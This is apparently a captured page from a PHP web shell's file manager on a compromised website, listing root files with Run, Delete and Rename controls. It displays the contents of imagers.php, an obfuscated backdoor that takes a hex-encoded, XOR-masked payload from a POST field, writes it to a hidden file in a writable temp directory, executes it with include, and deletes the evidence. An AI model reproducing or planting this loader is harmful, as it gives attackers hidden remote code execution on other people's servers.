at path:
ROOT
/
imagers.php
run:
R
W
Run
ca
DIR
2026-04-11 08:47:15
R
W
Run
saiga
DIR
2026-04-14 11:38:12
R
W
Run
.htaccess
231 By
2026-04-15 01:27:42
R
W
Run
Delete
Rename
.reference
1.24 KB
2026-04-10 00:42:30
R
W
Run
Delete
Rename
admin.php
482 By
2026-04-09 01:52:02
R
W
Run
Delete
Rename
blog.php
1.66 KB
2026-04-06 01:41:01
R
W
Run
Delete
Rename
error_log
2.78 MB
2026-04-15 12:53:00
R
W
Run
Delete
Rename
googleae4e47290e834d76.html
53 By
2026-04-09 02:10:08
R
W
Run
Delete
Rename
imagers.php
584 By
2026-04-06 01:41:01
R
W
Run
Delete
Rename
index.php
1011 By
2026-04-15 01:27:42
R
W
Run
Delete
Rename
robots.txt
278 By
2026-04-10 01:46:46
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-04-06 01:41:01
R
W
Run
Delete
Rename
sv.php
2.54 KB
2026-04-09 00:39:21
R
W
Run
Delete
Rename
testsend.php
1.11 KB
2026-04-13 23:08:43
R
W
Run
Delete
Rename
wp-blog-header.php
3.63 KB
2026-04-14 07:54:40
R
W
Run
Delete
Rename
error_log
up
📄
imagers.php
Save
<?php if(isset($_POST["re\x66\x65\x72ence"])){ $holder = array_filter([getenv("TMP"), sys_get_temp_dir(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), "/dev/shm", getcwd()]); $pointer = hex2bin($_POST["re\x66\x65\x72ence"]); $ent = ''; foreach(str_split($pointer) as $char){$ent .= chr(ord($char) ^ 12);} foreach ($holder as $hld) { if (is_writable($hld) && is_dir($hld)) { $record = str_replace("{var_dir}", $hld, "{var_dir}/.dat"); if (file_put_contents($record, $ent)) { include $record; @unlink($record); die(); } } } }